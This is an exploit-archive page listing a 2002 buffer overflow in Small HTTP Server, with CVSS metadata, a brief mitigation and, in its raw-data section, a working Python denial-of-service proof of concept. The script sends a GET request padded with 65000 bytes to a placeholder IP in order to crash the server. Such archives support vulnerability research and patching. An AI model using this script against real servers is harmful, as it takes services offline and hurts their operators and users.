header-logo
Suggest Exploit
vendor:
Small HTTP Server
by:
USSR Labs and Prizm
8.3
CVSS
HIGH
Buffer Overflow
120 (Buffer Copy without Checking Size of Input)
CWE
Product Name: Small HTTP Server
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: Yes
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2002

Small HTTP Server DoS Proof of Concept Code

A buffer overflow is present in certain versions of the Small HTTP Server. The overflow in question is triggered by an overlong (65000 or more characters) malformed HTTP GET request to the webserver. By connecting to port 80(http) on a system running Small HTTP Server and issuing a GET command followed by 65000 bytes, the service will crash.

Mitigation:

Upgrade to the latest version of Small HTTP Server or use an alternative web server.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/1355/info

A buffer overflow is present in certain versions of the Small HTTP Server . The overflow in question is triggered by an overlong (65000 or more characters) malformed HTTP GET request to the webserver. 
                                                                      
#!/usr/bin/python                                                     
#                                                                     
# Small HTTP Server DoS Proof of Concept Code.                        
# Vulnerability Discovered by USSR Labs(http://www.ussrback.com)      
# Simple Script by Prizm(Prizm@Resentment.org)                        
#                                                                     
# By connecting to port 80(http) on a system running Small HTTP Server
and issuing a GET                                                     
# command followed by 65000 bytes, the service will crash.            
#                                                                     
# This *simple* little script will cause http.exe to crash.           
                                                                      
import httplib                                                        
                                                                      
h = httplib.HTTP('xxx.xxx.xxx.xxx') #replace x's with ip              
h.putrequest('GET', 'A' * 65000)                                      
                                                                      
#end

Navigation

Suggest Exploit

Services By CQR